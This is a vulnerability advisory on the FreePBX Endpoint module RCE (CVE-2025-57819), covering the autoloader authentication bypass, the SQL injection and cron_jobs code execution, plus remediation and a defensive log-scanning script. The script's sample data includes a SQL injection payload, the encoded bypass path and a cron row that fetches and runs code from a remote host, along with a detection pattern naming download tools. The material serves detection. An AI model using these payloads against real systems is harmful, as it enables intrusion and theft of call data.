Full Report
FreePBX is a web-based GUI, written in PHP, for managing the Asterisk VoIP phone system. It is easy to stand up on a local network, and anyone who gains control of it can intercept or steal phone calls, voicemails and related data.

In August 2025, a FreePBX user started seeing strange error messages in their access logs. A day later, another user found a file called .clean.sh on their box that was cleaning up after an exploit. This is a serious problem: it clearly indicated a remote code execution vulnerability. The watchTowr team had previously reported a post-auth RCE bug to the developers, who did not act on it. This time they did. Why? Because this one appeared to be an unauthenticated RCE.

The vulnerability summary pointed to bad input validation. Command injection? SQL injection? It was not clear. One clue was available: the issue was in the Endpoint module, a FreePBX plugin that simplifies many aspects of phone provisioning and management. The team first looked for SSRFs, since requests originating from localhost bypass authentication, but that led nowhere. After calling various module commands with a single quote in a parameter, they were greeted with a SQL error. This led to a SQL injection that was obviously quite bad, but it was still post-auth.

Curious about how the attacker was actually getting in, the team set up a honeypot. After a short wait, a shiny new backdoor appeared on the system, planted through calls to /admin/ajax.php without authentication. But how? FreePBX has a module/extension system for adding functionality to a PBX instance, and ajax.php routes requests using the module parameter together with a command parameter. Using reflection, it checks whether a class of that name exists via PHP's class_exists, which in turn triggers the custom autoloader, fpbx_framework_autoloader, to try to load the class from disk.

The autoloader does some black magic to find the proper file to include. In practice, this allows any PHP file in the appropriate part of an install to be executed. Specifying the module as FreePBX\\modules\\Endpoint\\install, for instance, causes the module's install code to run. With this authentication bypass, it is now possible to reach the SQL injection without credentials and gain access to the device. The result is a complete authentication bypass for some modules. The patch fixed only the SQL injection, not the authentication issue, which is a design-level problem that will likely require significant effort to resolve.
Analysis Summary
# Vulnerability: Unauthenticated Remote Code Execution in FreePBX Endpoint Module
## CVE Details
- **CVE ID:** CVE-2025-57819
- **CVSS Score:** 9.8 (Critical) - *Estimated based on unauthenticated RCE impact*
- **CWE:** CWE-89 (SQL Injection), CWE-287 (Improper Authentication)
## Affected Systems
- **Products:** FreePBX (Web-based GUI for Asterisk)
- **Versions:** Endpoint module versions prior to the patch released after the August 2025 in-the-wild exploitation.
- **Configurations:** Systems with the **Endpoint** module installed. The vulnerability leverages the FreePBX framework's autoloader logic, which lets a request to `admin/ajax.php` reach module classes without authentication.
## Vulnerability Description
The vulnerability is a multi-stage exploit involving an authentication bypass and a SQL injection.
1. **Authentication Bypass:** The FreePBX `admin/ajax.php` endpoint routes on the `module` parameter by calling `class_exists()`, which triggers the custom `fpbx_framework_autoloader`. Because the autoloader resolves namespaced names to files on disk, an attacker can pass a value such as `FreePBX\\modules\\Endpoint\\...` (backslashes URL-encoded as `%5C`) to load and run module code without prior authentication.
2. **SQL Injection:** Inside the Endpoint module, the `brand` parameter (among others) in the `model` command lacks proper input validation. This allows an attacker to inject arbitrary SQL commands.
3. **Code Execution:** By exploiting the SQL injection, an attacker can insert a malicious row into the `cron_jobs` table. The FreePBX system's internal scheduler executes commands stored in this table, leading to Remote Code Execution (RCE) as the user running the PBX service.
## Exploitation
- **Status:** **Exploited in the wild.** Active mass exploitation was observed starting August 21, 2025.
- **Complexity:** Low
- **Attack Vector:** Network (Unauthenticated)
- **PoC Available:** Yes (A Detection Artefact Generator/Exploit script has been released by watchTowr Labs).
## Impact
- **Confidentiality:** Total (Access to call logs, voicemails, and audio interception).
- **Integrity:** Total (Ability to modify system files and plant backdoors).
- **Availability:** Total (Ability to crash the system or delete critical VoIP configurations).
## Remediation
### Patches
- Users must update the **FreePBX Endpoint module** via Module Admin in the web UI or from the shell with `fwconsole ma upgrade endpoint` (or `fwconsole ma upgradeall` to apply every pending module update).
- *Note:* Initial reports indicate the patch addressed the SQL injection but did not fully resolve the underlying "design-level" authentication bypass logic in the autoloader.
### Workarounds
- Restrict access to the FreePBX `/admin` interface to trusted IP addresses only using a firewall or VPN.
- Disable or uninstall the Endpoint module if it is not actively required for phone provisioning.
## Detection
- **Indicators of Compromise (IoC):**
- Presence of a file named `.clean.sh` in the web root or home directories.
- Unexpected entries in the `cron_jobs` database table.
- Log entries in HTTP access logs showing requests to `admin/ajax.php` whose `module` parameter is a namespaced class path such as `FreePBX\modules\Endpoint\...` (appearing URL-encoded as `module=FreePBX%5Cmodules%5CEndpoint...`) rather than a plain module name like `endpoint`. Note that parameters sent in a POST body do not appear in access logs.
- PHP fatal errors referencing `Symfony\Component\Console\Application` not found (often a side effect of botched exploitation).
- **Detection Methods:** Inspect the `asterisk` database: `SELECT * FROM cron_jobs;` and look for unrecognized shell commands.
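The script below is an added example for this page, written to show the two checks above as working code; it is not watchTowr's DAG and not FreePBX code. It assumes Apache combined-format access logs (the sample lines are constructed, not from any real incident) and, for the `cron_jobs` review, assumes the column names `modulename` and `command`, which you should adapt to whatever `SELECT * FROM cron_jobs` actually shows on your system.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format). Illustrative only,
# not captured from any real FreePBX system or incident.
SAMPLE_ACCESS_LOG = r'''
203.0.113.10 - - [21/Aug/2025:03:14:07 +0000] "POST /admin/ajax.php?module=endpoint&command=model&brand=grandstream HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.10 - - [21/Aug/2025:03:14:09 +0000] "POST /admin/ajax.php?module=endpoint&command=model&brand=x%27%20UNION%20SELECT%201%2C2%2C3--%20- HTTP/1.1" 500 1024 "-" "python-requests/2.31"
203.0.113.10 - - [21/Aug/2025:03:14:11 +0000] "GET /admin/ajax.php?module=FreePBX%5Cmodules%5CEndpoint%5Cinstall&command=run HTTP/1.1" 200 0 "-" "curl/8.0"
198.51.100.7 - - [21/Aug/2025:08:00:00 +0000] "GET /admin/config.php?display=dashboard HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Legitimate FreePBX module names are plain identifiers ("endpoint", "core").
# A backslash-separated namespace path is the autoloader-abuse signature.
SAFE_MODULE_RE = re.compile(r'^[A-Za-z0-9_]+$')
# Crude SQL metacharacter/keyword check for parameters sent to the Endpoint module.
SQLI_RE = re.compile(r"'|--|/\*|\b(union|select|insert|update|sleep|benchmark)\b", re.IGNORECASE)


def parse_line(line):
    """Parse one combined-format line into ip, timestamp, path, query params, status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m['target'])
    # parse_qs URL-decodes, so %5C becomes "\" and %27 becomes "'".
    params = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return {'ip': m['ip'], 'ts': m['ts'], 'path': parts.path,
            'params': params, 'status': int(m['status'])}


def classify(req):
    """Return the reasons this request looks like CVE-2025-57819 activity (empty if none)."""
    reasons = []
    if not req['path'].endswith('/admin/ajax.php'):
        return reasons
    module = req['params'].get('module', '')
    if module and not SAFE_MODULE_RE.match(module):
        reasons.append('namespaced module name (autoloader routing abuse)')
    if module.lower() == 'endpoint':
        for name, value in req['params'].items():
            if name != 'module' and SQLI_RE.search(value):
                reasons.append(f'SQL metacharacters in endpoint parameter {name!r}')
                break
    return reasons


def scan_access_log(text):
    """Scan log text and return one finding dict per (request, reason) pair."""
    findings = []
    for line in text.splitlines():
        req = parse_line(line.strip())
        if req is None:
            continue
        for reason in classify(req):
            findings.append({'ip': req['ip'], 'ts': req['ts'], 'status': req['status'],
                             'module': req['params'].get('module', ''), 'reason': reason})
    return findings


# Heuristic review of cron_jobs rows. The column names "modulename" and "command"
# are an ASSUMPTION for this example, not verified against the FreePBX schema.
SUSPICIOUS_CMD_RE = re.compile(
    r'(curl|wget|base64|/tmp/|/dev/shm/|\.clean\.sh|bash -c|python[23]? -c|php -r)',
    re.IGNORECASE)


def suspicious_cron_jobs(rows, installed_modules):
    """Flag rows whose module is not installed or whose command looks like a dropper."""
    flagged = []
    for row in rows:
        why = []
        if row.get('modulename', '') not in installed_modules:
            why.append('unknown module')
        if SUSPICIOUS_CMD_RE.search(row.get('command', '')):
            why.append('suspicious command')
        if why:
            flagged.append((row, why))
    return flagged


if __name__ == '__main__':
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} module={f['module']!r}: {f['reason']}")
    # Constructed rows, not real data.
    rows = [
        {'modulename': 'backup', 'command': 'fwconsole backup --run'},
        {'modulename': 'endpoint', 'command': 'curl -s http://203.0.113.10/x | bash -c "bash -s"'},
    ]
    for row, why in suspicious_cron_jobs(rows, {'core', 'backup'}):
        print('cron_jobs:', row, why)
```

Run it against a real access log with `scan_access_log(open('/var/log/httpd/access_log').read())` and feed `suspicious_cron_jobs` the rows from `SELECT modulename, command FROM cron_jobs`. Because access logs only record the query string, an exploit that sends `module` and `brand` in the POST body will be invisible to the first check; treat the database check as the more reliable of the two.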
## References
- watchTowr Labs Research: [https://labs.watchtowr.com/you-already-have-our-personal-data-take-our-phone-calls-too-freepbx-cve-2025-57819/](https://labs.watchtowr.com/you-already-have-our-personal-data-take-our-phone-calls-too-freepbx-cve-2025-57819/)
- FreePBX Community Discussion: [https://community.freepbx.org/t/107178](https://community.freepbx.org/t/107178)
- watchTowr PoC/DAG: [https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819](https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819)